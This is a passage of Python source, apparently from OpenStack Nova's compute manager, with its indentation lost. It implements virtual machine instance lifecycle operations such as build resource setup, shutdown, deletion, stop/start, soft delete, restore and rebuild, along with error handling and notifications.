self._notify_about_instance_usage(context, instance,
'create.error', fault=e)
compute_utils.notify_about_instance_create(
context, instance, self.host,
phase=fields.NotificationPhase.ERROR, exception=e,
bdms=block_device_mapping)
raise exception.BuildAbortException(instance_uuid=instance.uuid,
reason=e.format_message())
except Exception as e:
self._notify_about_instance_usage(context, instance,
'create.error', fault=e)
compute_utils.notify_about_instance_create(
context, instance, self.host,
phase=fields.NotificationPhase.ERROR, exception=e,
bdms=block_device_mapping)
raise exception.RescheduledException(
instance_uuid=instance.uuid, reason=six.text_type(e))
# NOTE(alaski): This is only useful during reschedules, remove it now.
instance.system_metadata.pop('network_allocated', None)
# If CONF.default_access_ip_network_name is set, grab the
# corresponding network and set the access ip values accordingly.
network_name = CONF.default_access_ip_network_name
if (network_name and not instance.access_ip_v4 and
not instance.access_ip_v6):
# Note that when there are multiple ips to choose from, an
# arbitrary one will be chosen.
for vif in network_info:
if vif['network']['label'] == network_name:
for ip in vif.fixed_ips():
if not instance.access_ip_v4 and ip['version'] == 4:
instance.access_ip_v4 = ip['address']
if not instance.access_ip_v6 and ip['version'] == 6:
instance.access_ip_v6 = ip['address']
break
self._update_instance_after_spawn(context, instance)
try:
instance.save(expected_task_state=task_states.SPAWNING)
except (exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError) as e:
with excutils.save_and_reraise_exception():
self._notify_about_instance_usage(context, instance,
'create.error', fault=e)
compute_utils.notify_about_instance_create(
context, instance, self.host,
phase=fields.NotificationPhase.ERROR, exception=e,
bdms=block_device_mapping)
self._update_scheduler_instance_info(context, instance)
self._notify_about_instance_usage(context, instance, 'create.end',
extra_usage_info={'message': _('Success')},
network_info=network_info)
compute_utils.notify_about_instance_create(context, instance,
self.host, phase=fields.NotificationPhase.END,
bdms=block_device_mapping)
@contextlib.contextmanager
def _build_resources(self, context, instance, requested_networks,
security_groups, image_meta, block_device_mapping):
resources = {}
network_info = None
try:
LOG.debug('Start building networks asynchronously for instance.',
instance=instance)
network_info = self._build_networks_for_instance(context, instance,
requested_networks, security_groups)
resources['network_info'] = network_info
except (exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError):
raise
except exception.UnexpectedTaskStateError as e:
raise exception.BuildAbortException(instance_uuid=instance.uuid,
reason=e.format_message())
except Exception:
# Because this allocation is async any failures are likely to occur
# when the driver accesses network_info during spawn().
LOG.exception('Failed to allocate network(s)',
instance=instance)
msg = _('Failed to allocate the network(s), not rescheduling.')
raise exception.BuildAbortException(instance_uuid=instance.uuid,
reason=msg)
try:
# Depending on a virt driver, some network configuration is
# necessary before preparing block devices.
self.driver.prepare_networks_before_block_device_mapping(
instance, network_info)
# Verify that all the BDMs have a device_name set and assign a
# default to the ones missing it with the help of the driver.
self._default_block_device_names(instance, image_meta,
block_device_mapping)
LOG.debug('Start building block device mappings for instance.',
instance=instance)
instance.vm_state = vm_states.BUILDING
instance.task_state = task_states.BLOCK_DEVICE_MAPPING
instance.save()
block_device_info = self._prep_block_device(context, instance,
block_device_mapping)
resources['block_device_info'] = block_device_info
except (exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError):
with excutils.save_and_reraise_exception():
# Make sure the async call finishes
if network_info is not None:
network_info.wait(do_raise=False)
self.driver.clean_networks_preparation(instance,
network_info)
except (exception.UnexpectedTaskStateError,
exception.OverQuota, exception.InvalidBDM,
exception.QuotaError) as e:
# Make sure the async call finishes
if network_info is not None:
network_info.wait(do_raise=False)
self.driver.clean_networks_preparation(instance, network_info)
raise exception.BuildAbortException(instance_uuid=instance.uuid,
reason=e.format_message())
except Exception:
LOG.exception('Failure prepping block device',
instance=instance)
# Make sure the async call finishes
if network_info is not None:
network_info.wait(do_raise=False)
self.driver.clean_networks_preparation(instance, network_info)
msg = _('Failure prepping block device.')
raise exception.BuildAbortException(instance_uuid=instance.uuid,
reason=msg)
try:
resources['allocations'] = (
self.reportclient.get_allocations_for_consumer(context,
instance.uuid))
except Exception:
LOG.exception('Failure retrieving placement allocations',
instance=instance)
# Make sure the async call finishes
if network_info is not None:
network_info.wait(do_raise=False)
msg = _('Failure retrieving placement allocations')
raise exception.BuildAbortException(instance_uuid=instance.uuid,
reason=msg)
try:
yield resources
except Exception as exc:
with excutils.save_and_reraise_exception() as ctxt:
if not isinstance(exc, (
exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError)):
LOG.exception('Instance failed to spawn',
instance=instance)
# Make sure the async call finishes
if network_info is not None:
network_info.wait(do_raise=False)
# if network_info is empty we're likely here because of
# network allocation failure. Since nothing can be reused on
# rescheduling it's better to deallocate network to eliminate
# the chance of orphaned ports in neutron
deallocate_networks = False if network_info else True
try:
self._shutdown_instance(context, instance,
block_device_mapping, requested_networks,
try_deallocate_networks=deallocate_networks)
except Exception as exc2:
ctxt.reraise = False
LOG.warning('Could not clean up failed build,'
' not rescheduling. Error: %s',
six.text_type(exc2))
raise exception.BuildAbortException(
instance_uuid=instance.uuid,
reason=six.text_type(exc))
def _cleanup_allocated_networks(self, context, instance,
requested_networks):
try:
self._deallocate_network(context, instance, requested_networks)
except Exception:
LOG.exception('Failed to deallocate networks', instance=instance)
return
instance.system_metadata['network_allocated'] = 'False'
try:
instance.save()
except exception.InstanceNotFound:
# NOTE(alaski): It's possible that we're cleaning up the networks
# because the instance was deleted. If that's the case then this
# exception will be raised by instance.save()
pass
def _try_deallocate_network(self, context, instance,
requested_networks=None):
try:
# tear down allocated network structure
self._deallocate_network(context, instance, requested_networks)
except Exception as ex:
with excutils.save_and_reraise_exception():
LOG.error('Failed to deallocate network for instance. '
'Error: %s', ex, instance=instance)
self._set_instance_obj_error_state(context, instance)
def _get_power_off_values(self, context, instance, clean_shutdown):
"""Get the timing configuration for powering down this instance."""
if clean_shutdown:
timeout = compute_utils.get_value_from_system_metadata(instance,
key='image_os_shutdown_timeout', type=int,
default=CONF.shutdown_timeout)
retry_interval = self.SHUTDOWN_RETRY_INTERVAL
else:
timeout = 0
retry_interval = 0
return timeout, retry_interval
def _power_off_instance(self, context, instance, clean_shutdown=True):
"""Power off an instance on this host."""
timeout, retry_interval = self._get_power_off_values(context,
instance, clean_shutdown)
self.driver.power_off(instance, timeout, retry_interval)
def _shutdown_instance(self, context, instance,
bdms, requested_networks=None, notify=True,
try_deallocate_networks=True):
"""Shutdown an instance on this host.
:param:context: security context
:param:instance: a nova.objects.Instance object
:param:bdms: the block devices for the instance to be torn
down
:param:requested_networks: the networks on which the instance
has ports
:param:notify: true if a final usage notification should be
emitted
:param:try_deallocate_networks: false if we should avoid
trying to teardown networking
"""
context = context.elevated()
LOG.info('Terminating instance', instance=instance)
if notify:
self._notify_about_instance_usage(context, instance,
"shutdown.start")
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.SHUTDOWN,
phase=fields.NotificationPhase.START, bdms=bdms)
network_info = instance.get_network_info()
# NOTE(vish) get bdms before destroying the instance
vol_bdms = [bdm for bdm in bdms if bdm.is_volume]
block_device_info = self._get_instance_block_device_info(
context, instance, bdms=bdms)
# NOTE(melwitt): attempt driver destroy before releasing ip, may
# want to keep ip allocated for certain failures
timer = timeutils.StopWatch()
try:
LOG.debug('Start destroying the instance on the hypervisor.',
instance=instance)
timer.start()
self.driver.destroy(context, instance, network_info,
block_device_info)
LOG.info('Took %0.2f seconds to destroy the instance on the '
'hypervisor.', timer.elapsed(), instance=instance)
except exception.InstancePowerOffFailure:
# if the instance can't power off, don't release the ip
with excutils.save_and_reraise_exception():
pass
except Exception:
with excutils.save_and_reraise_exception():
# deallocate ip and fail without proceeding to
# volume api calls, preserving current behavior
if try_deallocate_networks:
self._try_deallocate_network(context, instance,
requested_networks)
if try_deallocate_networks:
self._try_deallocate_network(context, instance, requested_networks)
timer.restart()
for bdm in vol_bdms:
try:
if bdm.attachment_id:
self.volume_api.attachment_delete(context,
bdm.attachment_id)
else:
# NOTE(vish): actual driver detach done in driver.destroy,
# so just tell cinder that we are done with it.
connector = self.driver.get_volume_connector(instance)
self.volume_api.terminate_connection(context,
bdm.volume_id,
connector)
self.volume_api.detach(context, bdm.volume_id,
instance.uuid)
except exception.VolumeAttachmentNotFound as exc:
LOG.debug('Ignoring VolumeAttachmentNotFound: %s', exc,
instance=instance)
except exception.DiskNotFound as exc:
LOG.debug('Ignoring DiskNotFound: %s', exc,
instance=instance)
except exception.VolumeNotFound as exc:
LOG.debug('Ignoring VolumeNotFound: %s', exc,
instance=instance)
except (cinder_exception.EndpointNotFound,
keystone_exception.EndpointNotFound) as exc:
LOG.warning('Ignoring EndpointNotFound for '
'volume %(volume_id)s: %(exc)s',
{'exc': exc, 'volume_id': bdm.volume_id},
instance=instance)
except cinder_exception.ClientException as exc:
LOG.warning('Ignoring unknown cinder exception for '
'volume %(volume_id)s: %(exc)s',
{'exc': exc, 'volume_id': bdm.volume_id},
instance=instance)
except Exception as exc:
LOG.warning('Ignoring unknown exception for '
'volume %(volume_id)s: %(exc)s',
{'exc': exc, 'volume_id': bdm.volume_id},
instance=instance)
if vol_bdms:
LOG.info('Took %(time).2f seconds to detach %(num)s volumes '
'for instance.',
{'time': timer.elapsed(), 'num': len(vol_bdms)},
instance=instance)
if notify:
self._notify_about_instance_usage(context, instance,
"shutdown.end")
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.SHUTDOWN,
phase=fields.NotificationPhase.END, bdms=bdms)
def _cleanup_volumes(self, context, instance, bdms, raise_exc=True,
detach=True):
exc_info = None
for bdm in bdms:
if detach and bdm.volume_id:
try:
LOG.debug("Detaching volume: %s", bdm.volume_id,
instance_uuid=instance.uuid)
destroy = bdm.delete_on_termination
self._detach_volume(context, bdm, instance,
destroy_bdm=destroy)
except Exception as exc:
exc_info = sys.exc_info()
LOG.warning('Failed to detach volume: %(volume_id)s '
'due to %(exc)s',
{'volume_id': bdm.volume_id, 'exc': exc})
if bdm.volume_id and bdm.delete_on_termination:
try:
LOG.debug("Deleting volume: %s", bdm.volume_id,
instance_uuid=instance.uuid)
self.volume_api.delete(context, bdm.volume_id)
except Exception as exc:
exc_info = sys.exc_info()
LOG.warning('Failed to delete volume: %(volume_id)s '
'due to %(exc)s',
{'volume_id': bdm.volume_id, 'exc': exc})
if exc_info is not None and raise_exc:
six.reraise(exc_info[0], exc_info[1], exc_info[2])
@hooks.add_hook("delete_instance")
def _delete_instance(self, context, instance, bdms):
"""Delete an instance on this host.
:param context: nova request context
:param instance: nova.objects.instance.Instance object
:param bdms: nova.objects.block_device.BlockDeviceMappingList object
"""
events = self.instance_events.clear_events_for_instance(instance)
if events:
LOG.debug('Events pending at deletion: %(events)s',
{'events': ','.join(events.keys())},
instance=instance)
self._notify_about_instance_usage(context, instance,
"delete.start")
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.DELETE,
phase=fields.NotificationPhase.START, bdms=bdms)
self._shutdown_instance(context, instance, bdms)
# NOTE(dims): instance.info_cache.delete() should be called after
# _shutdown_instance in the compute manager as shutdown calls
# deallocate_for_instance so the info_cache is still needed
# at this point.
if instance.info_cache is not None:
instance.info_cache.delete()
else:
# NOTE(yoshimatsu): Avoid AttributeError if instance.info_cache
# is None. When the root cause that instance.info_cache becomes
# None is fixed, the log level should be reconsidered.
LOG.warning("Info cache for instance could not be found. "
"Ignore.", instance=instance)
# NOTE(vish): We have already deleted the instance, so we have
# to ignore problems cleaning up the volumes. It
# would be nice to let the user know somehow that
# the volume deletion failed, but it is not
# acceptable to have an instance that can not be
# deleted. Perhaps this could be reworked in the
# future to set an instance fault the first time
# and to only ignore the failure if the instance
# is already in ERROR.
# NOTE(ameeda): The volumes already detached during the above
# _shutdown_instance() call and this is why
# detach is not requested from _cleanup_volumes()
# in this case
self._cleanup_volumes(context, instance, bdms,
raise_exc=False, detach=False)
# if a delete task succeeded, always update vm state and task
# state without expecting task state to be DELETING
instance.vm_state = vm_states.DELETED
instance.task_state = None
instance.power_state = power_state.NOSTATE
instance.terminated_at = timeutils.utcnow()
instance.save()
system_meta = instance.system_metadata
instance.destroy()
self._complete_deletion(context,
instance,
bdms,
system_meta)
@wrap_exception()
@reverts_task_state
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def terminate_instance(self, context, instance, bdms):
"""Terminate an instance on this host."""
@utils.synchronized(instance.uuid)
def do_terminate_instance(instance, bdms):
# NOTE(mriedem): If we are deleting the instance while it was
# booting from volume, we could be racing with a database update of
# the BDM volume_id. Since the compute API passes the BDMs over RPC
# to compute here, the BDMs may be stale at this point. So check
# for any volume BDMs that don't have volume_id set and if we
# detect that, we need to refresh the BDM list before proceeding.
# TODO(mriedem): Move this into _delete_instance and make the bdms
# parameter optional.
for bdm in list(bdms):
if bdm.is_volume and not bdm.volume_id:
LOG.debug('There are potentially stale BDMs during '
'delete, refreshing the BlockDeviceMappingList.',
instance=instance)
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
break
try:
self._delete_instance(context, instance, bdms)
except exception.InstanceNotFound:
LOG.info("Instance disappeared during terminate",
instance=instance)
except Exception:
# As we're trying to delete always go to Error if something
# goes wrong that _delete_instance can't handle.
with excutils.save_and_reraise_exception():
LOG.exception('Setting instance vm_state to ERROR',
instance=instance)
self._set_instance_obj_error_state(context, instance)
do_terminate_instance(instance, bdms)
# NOTE(johannes): This is probably better named power_off_instance
# so it matches the driver method, but because of other issues, we
# can't use that name in grizzly.
@wrap_exception()
@reverts_task_state
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def stop_instance(self, context, instance, clean_shutdown):
"""Stopping an instance on this host."""
@utils.synchronized(instance.uuid)
def do_stop_instance():
current_power_state = self._get_power_state(context, instance)
LOG.debug('Stopping instance; current vm_state: %(vm_state)s, '
'current task_state: %(task_state)s, current DB '
'power_state: %(db_power_state)s, current VM '
'power_state: %(current_power_state)s',
{'vm_state': instance.vm_state,
'task_state': instance.task_state,
'db_power_state': instance.power_state,
'current_power_state': current_power_state},
instance_uuid=instance.uuid)
# NOTE(mriedem): If the instance is already powered off, we are
# possibly tearing down and racing with other operations, so we can
# expect the task_state to be None if something else updates the
# instance and we're not locking it.
expected_task_state = [task_states.POWERING_OFF]
# The list of power states is from _sync_instance_power_state.
if current_power_state in (power_state.NOSTATE,
power_state.SHUTDOWN,
power_state.CRASHED):
LOG.info('Instance is already powered off in the '
'hypervisor when stop is called.',
instance=instance)
expected_task_state.append(None)
self._notify_about_instance_usage(context, instance,
"power_off.start")
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.POWER_OFF,
phase=fields.NotificationPhase.START)
self._power_off_instance(context, instance, clean_shutdown)
instance.power_state = self._get_power_state(context, instance)
instance.vm_state = vm_states.STOPPED
instance.task_state = None
instance.save(expected_task_state=expected_task_state)
self._notify_about_instance_usage(context, instance,
"power_off.end")
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.POWER_OFF,
phase=fields.NotificationPhase.END)
do_stop_instance()
def _power_on(self, context, instance):
network_info = self.network_api.get_instance_nw_info(context, instance)
block_device_info = self._get_instance_block_device_info(context,
instance)
self.driver.power_on(context, instance,
network_info,
block_device_info)
def _delete_snapshot_of_shelved_instance(self, context, instance,
snapshot_id):
"""Delete snapshot of shelved instance."""
try:
self.image_api.delete(context, snapshot_id)
except (exception.ImageNotFound,
exception.ImageNotAuthorized) as exc:
LOG.warning("Failed to delete snapshot "
"from shelved instance (%s).",
exc.format_message(), instance=instance)
except Exception:
LOG.exception("Something wrong happened when trying to "
"delete snapshot from shelved instance.",
instance=instance)
# NOTE(johannes): This is probably better named power_on_instance
# so it matches the driver method, but because of other issues, we
# can't use that name in grizzly.
@wrap_exception()
@reverts_task_state
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def start_instance(self, context, instance):
"""Starting an instance on this host."""
self._notify_about_instance_usage(context, instance, "power_on.start")
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.POWER_ON,
phase=fields.NotificationPhase.START)
self._power_on(context, instance)
instance.power_state = self._get_power_state(context, instance)
instance.vm_state = vm_states.ACTIVE
instance.task_state = None
# Delete an image(VM snapshot) for a shelved instance
snapshot_id = instance.system_metadata.get('shelved_image_id')
if snapshot_id:
self._delete_snapshot_of_shelved_instance(context, instance,
snapshot_id)
# Delete system_metadata for a shelved instance
compute_utils.remove_shelved_keys_from_system_metadata(instance)
instance.save(expected_task_state=task_states.POWERING_ON)
self._notify_about_instance_usage(context, instance, "power_on.end")
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.POWER_ON,
phase=fields.NotificationPhase.END)
@messaging.expected_exceptions(NotImplementedError,
exception.TriggerCrashDumpNotSupported,
exception.InstanceNotRunning)
@wrap_exception()
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def trigger_crash_dump(self, context, instance):
"""Trigger crash dump in an instance."""
self._notify_about_instance_usage(context, instance,
"trigger_crash_dump.start")
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.TRIGGER_CRASH_DUMP,
phase=fields.NotificationPhase.START)
# This method does not change task_state and power_state because the
# effect of a trigger depends on user's configuration.
self.driver.trigger_crash_dump(instance)
self._notify_about_instance_usage(context, instance,
"trigger_crash_dump.end")
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.TRIGGER_CRASH_DUMP,
phase=fields.NotificationPhase.END)
@wrap_exception()
@reverts_task_state
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def soft_delete_instance(self, context, instance):
"""Soft delete an instance on this host."""
with compute_utils.notify_about_instance_delete(
self.notifier, context, instance, 'soft_delete'):
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.SOFT_DELETE,
phase=fields.NotificationPhase.START)
try:
self.driver.soft_delete(instance)
except NotImplementedError:
# Fallback to just powering off the instance if the
# hypervisor doesn't implement the soft_delete method
self.driver.power_off(instance)
instance.power_state = self._get_power_state(context, instance)
instance.vm_state = vm_states.SOFT_DELETED
instance.task_state = None
instance.save(expected_task_state=[task_states.SOFT_DELETING])
compute_utils.notify_about_instance_action(
context, instance, self.host,
action=fields.NotificationAction.SOFT_DELETE,
phase=fields.NotificationPhase.END)
@wrap_exception()
@reverts_task_state
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def restore_instance(self, context, instance):
"""Restore a soft-deleted instance on this host."""
self._notify_about_instance_usage(context, instance, "restore.start")
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.RESTORE,
phase=fields.NotificationPhase.START)
try:
self.driver.restore(instance)
except NotImplementedError:
# Fallback to just powering on the instance if the hypervisor
# doesn't implement the restore method
self._power_on(context, instance)
instance.power_state = self._get_power_state(context, instance)
instance.vm_state = vm_states.ACTIVE
instance.task_state = None
instance.save(expected_task_state=task_states.RESTORING)
self._notify_about_instance_usage(context, instance, "restore.end")
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.RESTORE,
phase=fields.NotificationPhase.END)
@staticmethod
def _set_migration_status(migration, status):
"""Set the status, and guard against a None being passed in.
This is useful as some of the compute RPC calls will not pass
a migration object in older versions. The check can be removed when
we move past 4.x major version of the RPC API.
"""
if migration:
migration.status = status
migration.save()
def _rebuild_default_impl(self, context, instance, image_meta,
injected_files, admin_password, allocations,
bdms, detach_block_devices, attach_block_devices,
network_info=None,
recreate=False, block_device_info=None,
preserve_ephemeral=False):
if preserve_ephemeral:
# The default code path does not support preserving ephemeral
# partitions.
raise exception.PreserveEphemeralNotSupported()
if recreate:
detach_block_devices(context, bdms)
else:
self._power_off_instance(context, instance, clean_shutdown=True)
detach_block_devices(context, bdms)
self.driver.destroy(context, instance,
network_info=network_info,
block_device_info=block_device_info)
instance.task_state = task_states.REBUILD_BLOCK_DEVICE_MAPPING
instance.save(expected_task_state=[task_states.REBUILDING])
new_block_device_info = attach_block_devices(context, instance, bdms)
instance.task_state = task_states.REBUILD_SPAWNING
instance.save(
expected_task_state=[task_states.REBUILD_BLOCK_DEVICE_MAPPING])
with instance.mutated_migration_context():
self.driver.spawn(context, instance, image_meta, injected_files,
admin_password, allocations,
network_info=network_info,
block_device_info=new_block_device_info)
def _notify_instance_rebuild_error(self, context, instance, error, bdms):
self._notify_about_instance_usage(context, instance,
'rebuild.error', fault=error)
compute_utils.notify_about_instance_action(
context, instance, self.host,
action=fields.NotificationAction.REBUILD,
phase=fields.NotificationPhase.ERROR, exception=error, bdms=bdms)
@messaging.expected_exceptions(exception.PreserveEphemeralNotSupported)
@wrap_exception()
@reverts_task_state
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def rebuild_instance(self, context, instance, orig_image_ref, image_ref,
injected_files, new_pass, orig_sys_metadata,
bdms, recreate, on_shared_storage,
preserve_ephemeral, migration,
scheduled_node, limits, request_spec):
"""Destroy and re-make this instance.
A 'rebuild' effectively purges all existing data from the system and
remakes the VM with given 'metadata' and 'personalities'.
:param context: `nova.RequestContext` object
:param instance: Instance object
:param orig_image_ref: Original image_ref before rebuild
:param image_ref: New image_ref for rebuild
:param injected_files: Files to inject
:param new_pass: password to set on rebuilt instance
:param orig_sys_metadata: instance system metadata from pre-rebuild
:param bdms: block-device-mappings to use for rebuild
:param recreate: True if the instance is being recreated (e.g. the
hypervisor it was on failed) - cleanup of old state will be
skipped.
:param on_shared_storage: True if instance files on shared storage.
If not provided then information from the
driver will be used to decide if the instance
files are available or not on the target host
:param preserve_ephemeral: True if the default ephemeral storage
partition must be preserved on rebuild
:param migration: a Migration object if one was created for this
rebuild operation (if it's a part of evacuate)
:param scheduled_node: A node of the host chosen by the scheduler. If a
host was specified by the user, this will be
None
:param limits: Overcommit limits set by the scheduler. If a host was
specified by the user, this will be None
:param request_spec: a RequestSpec object used to schedule the instance
"""
context = context.elevated()
LOG.info("Rebuilding instance", instance=instance)
rt = self._get_resource_tracker()
if recreate:
# This is an evacuation to a new host, so we need to perform a
# resource claim.
rebuild_claim = rt.rebuild_claim
else:
# This is a rebuild to the same host, so we don't need to make
# a claim since the instance is already on this host.
rebuild_claim = claims.NopClaim
image_meta = {}
if image_ref:
image_meta = self.image_api.get(context, image_ref)
# NOTE(mriedem): On a recreate (evacuate), we need to update
# the instance's host and node properties to reflect it's
# destination node for the recreate.
if not scheduled_node:
if recreate:
try:
compute_node = self._get_compute_info(context, self.host)
scheduled_node = compute_node.hypervisor_hostname
except exception.ComputeHostNotFound:
LOG.exception('Failed to get compute_info for %s',
self.host)
else:
scheduled_node = instance.node
with self._error_out_instance_on_exception(context, instance):
try:
claim_ctxt = rebuild_claim(
context, instance, scheduled_node,
limits=limits, image_meta=image_meta,
migration=migration)
self._do_rebuild_instance_with_claim(
claim_ctxt, context, instance, orig_image_ref,
image_ref, injected_files, new_pass, orig_sys_metadata,
bdms, recreate, on_shared_storage, preserve_ephemeral,
migration, request_spec)
except (exception.ComputeResourcesUnavailable,
exception.RescheduledException) as e:
if isinstance(e, exception.ComputeResourcesUnavailable):
LOG.debug("Could not rebuild instance on this host, not "
"enough resources available.", instance=instance)
else:
# RescheduledException is raised by the late server group
# policy check during evacuation if a parallel scheduling
# violated the policy.
# We catch the RescheduledException here but we don't have
# the plumbing to do an actual reschedule so we abort the
# operation.
LOG.debug("Could not rebuild instance on this host, "
"late server group check failed.",
instance=instance)
# NOTE(ndipanov): We just abort the build for now and leave a
# migration record for potential cleanup later
self._set_migration_status(migration, 'failed')
# Since the claim failed, we need to remove the allocation
# created against the destination node. Note that we can only
# get here when evacuating to a destination node. Rebuilding
# on the same host (not evacuate) uses the NopClaim which will
# not raise ComputeResourcesUnavailable.
rt.delete_allocation_for_evacuated_instance(
context, instance, scheduled_node, node_type='destination')
self._notify_instance_rebuild_error(context, instance, e, bdms)
raise exception.BuildAbortException(
instance_uuid=instance.uuid, reason=e.format_message())
except (exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError) as e:
LOG.debug('Instance was deleted while rebuilding',
instance=instance)
self._set_migration_status(migration, 'failed')
self._notify_instance_rebuild_error(context, instance, e, bdms)
except Exception as e:
self._set_migration_status(migration, 'failed')
if recreate or scheduled_node is not None:
rt.delete_allocation_for_evacuated_instance(
context, instance, scheduled_node,
node_type='destination')
self._notify_instance_rebuild_error(context, instance, e, bdms)
raise
else:
instance.apply_migration_context()
# NOTE (ndipanov): This save will now update the host and node
# attributes making sure that next RT pass is consistent since
# it will be based on the instance and not the migration DB
# entry.
instance.host = self.host
instance.node = scheduled_node
instance.save()
instance.drop_migration_context()
# NOTE (ndipanov): Mark the migration as done only after we
# mark the instance as belonging to this host.
self._set_migration_status(migration, 'done')
def _do_rebuild_instance_with_claim(self, claim_context, *args, **kwargs):
"""Helper to avoid deep nesting in the top-level method."""
with claim_context:
self._do_rebuild_instance(*args, **kwargs)
@staticmethod
def _get_image_name(image_meta):
if image_meta.obj_attr_is_set("name"):
return image_meta.name
else:
return ''
def _do_rebuild_instance(self, context, instance, orig_image_ref,
image_ref, injected_files, new_pass,
orig_sys_metadata, bdms, recreate,
on_shared_storage, preserve_ephemeral,
migration, request_spec):
orig_vm_state = instance.vm_state
if recreate:
if request_spec:
# NOTE(gibi): Do a late check of server group policy as
# parallel scheduling could violate such policy. This will
# cause the evacuate to fail as rebuild does not implement
# reschedule.
hints = self._get_scheduler_hints({}, request_spec)
self._validate_instance_group_policy(context, instance, hints)
if not self.driver.capabilities["supports_recreate"]:
raise exception.InstanceRecreateNotSupported
self._check_instance_exists(context, instance)
if on_shared_storage is None:
LOG.debug('on_shared_storage is not provided, using driver'
'information to decide if the instance needs to'
'be recreated')
on_shared_storage = self.driver.instance_on_disk(instance)
elif (on_shared_storage !=
self.driver.instance_on_disk(instance)):
# To cover case when admin expects that instance files are
# on shared storage, but not accessible and vice versa
raise exception.InvalidSharedStorage(
_("Invalid state of instance files on shared"
" storage"))
if on_shared_storage:
LOG.info('disk on shared storage, recreating using'
' existing disk')
else:
image_ref = orig_image_ref = instance.image_ref
LOG.info("disk not on shared storage, rebuilding from:"
" '%s'", str(image_ref))
if image_ref:
image_meta = objects.ImageMeta.from_image_ref(
context, self.image_api, image_ref)
else:
image_meta = instance.image_meta
# This instance.exists message should contain the original
# image_ref, not the new one. Since the DB has been updated
# to point to the new one... we have to override it.
orig_image_ref_url = self.image_api.generate_image_url(orig_image_ref,
context)
extra_usage_info = {'image_ref_url': orig_image_ref_url}
compute_utils.notify_usage_exists(
self.notifier, context, instance,
current_period=True, system_metadata=orig_sys_metadata,
extra_usage_info=extra_usage_info)
# This message should contain the new image_ref
extra_usage_info = {'image_name': self._get_image_name(image_meta)}
self._notify_about_instance_usage(context, instance,
"rebuild.start", extra_usage_info=extra_usage_info)
# NOTE: image_name is not included in the versioned notification
# because we already provide the image_uuid in the notification
# payload and the image details can be looked up via the uuid.
compute_utils.notify_about_instance_action(
context, instance, self.host,
action=fields.NotificationAction.REBUILD,
phase=fields.NotificationPhase.START,
bdms=bdms)
instance.power_state = self._get_power_state(context, instance)
instance.task_state = task_states.REBUILDING
instance.save(expected_task_state=[task_states.REBUILDING])
if recreate:
self.network_api.setup_networks_on_host(
context, instance, self.host)
# For nova-network this is needed to move floating IPs
# For neutron this updates the host in the port binding
# TODO(cfriesen): this network_api call and the one above
# are so similar, we should really try to unify them.
self.network_api.setup_instance_network_on_host(
context, instance, self.host, migration)
# TODO(mriedem): Consider decorating setup_instance_network_on_host
# with @base_api.refresh_cache and then we wouldn't need this
# explicit call to get_instance_nw_info.
network_info = self.network_api.get_instance_nw_info(context,
instance)
else:
network_info = instance.get_network_info()
allocations = self.reportclient.get_allocations_for_consumer(
context, instance.uuid)
if bdms is None:
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
block_device_info = \
self._get_instance_block_device_info(
context, instance, bdms=bdms)
def detach_block_devices(context, bdms):
for bdm in bdms:
if bdm.is_volume:
# NOTE (ildikov): Having the attachment_id set in the BDM
# means that it's the new Cinder attach/detach flow
# (available from v3.44). In that case we explicitly
# attach and detach the volumes through attachment level
# operations. In this scenario _detach_volume will delete
# the existing attachment which would make the volume
# status change to 'available' if we don't pre-create
# another empty attachment before deleting the old one.
attachment_id = None
if bdm.attachment_id:
attachment_id = self.volume_api.attachment_create(
context, bdm['volume_id'], instance.uuid)['id']
self._detach_volume(context, bdm, instance,
destroy_bdm=False)
if attachment_id:
bdm.attachment_id = attachment_id
bdm.save()
files = self._decode_files(injected_files)
kwargs = dict(
context=context,
instance=instance,
image_meta=image_meta,
injected_files=files,
admin_password=new_pass,
allocations=allocations,
bdms=bdms,
detach_block_devices=detach_block_devices,
attach_block_devices=self._prep_block_device,
block_device_info=block_device_info,
network_info=network_info,
preserve_ephemeral=preserve_ephemeral,
recreate=recreate)
try:
with instance.mutated_migration_context():
self.driver.rebuild(**kwargs)
except NotImplementedError:
# NOTE(rpodolyaka): driver doesn't provide specialized version
# of rebuild, fall back to the default implementation
self._rebuild_default_impl(**kwargs)
self._update_instance_after_spawn(context, instance)
instance.save(expected_task_state=[task_states.REBUILD_SPAWNING])
if orig_vm_state == vm_states.STOPPED:
LOG.info("bringing vm to original state: '%s'",
orig_vm_state, instance=instance)
instance.vm_state = vm_states.ACTIVE
instance.task_state = task_states.POWERING_OFF
instance.progress = 0
instance.save()
self.stop_instance(context, instance, False)
self._update_scheduler_instance_info(context, instance)
self._notify_about_instance_usage(
context, instance, "rebuild.end",
network_info=network_info,
extra_usage_info=extra_usage_info)
compute_utils.notify_about_instance_action(
context, instance, self.host,
action=fields.NotificationAction.REBUILD,
phase=fields.NotificationPhase.END,
bdms=bdms)
def _handle_bad_volumes_detached(self, context, instance, bad_devices,
block_device_info):
"""Handle cases where the virt-layer had to detach non-working volumes
in order to complete an operation.
"""
